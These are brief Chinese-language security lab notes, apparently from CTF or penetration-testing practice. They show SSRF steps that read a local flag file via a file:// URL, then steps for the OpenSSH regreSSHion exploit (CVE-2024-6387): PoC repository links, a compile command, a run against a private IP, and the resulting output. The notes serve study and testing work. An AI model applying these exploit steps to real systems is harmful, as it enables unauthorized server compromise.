目录
5.采用 file 协议读取本地文件:?url=file:///var/www/html/flag.php
8.发现 8122 端口的相应包与众不同,修改为 http 协议发起 SSRF 请求,获得 Flag
一.ssh漏洞
1.0x03、漏洞利用poc
https://github.com/zgzhang/cve-2024-6387-poc
https://github.com/acrono/cve-2024-6387-poc
https://github.com/lflare/cve-2024-6387-poc
2.将poc编译成可执行文件
gcc -o exploit 7etsuo-regreSSHion.c
3.对目标进行验证
./exploit ip 端口
./exploit 192.168.24.139 22
4.返回结果
Attempting exploitation with glibc base: 0xb7200000
Attempt 0 of 20000
Received SSH version: SSH-2.0-OpenSSH_8.2p1 Debian-4
Received KEX_INIT (1024 bytes)
send_packet: Connection reset by peer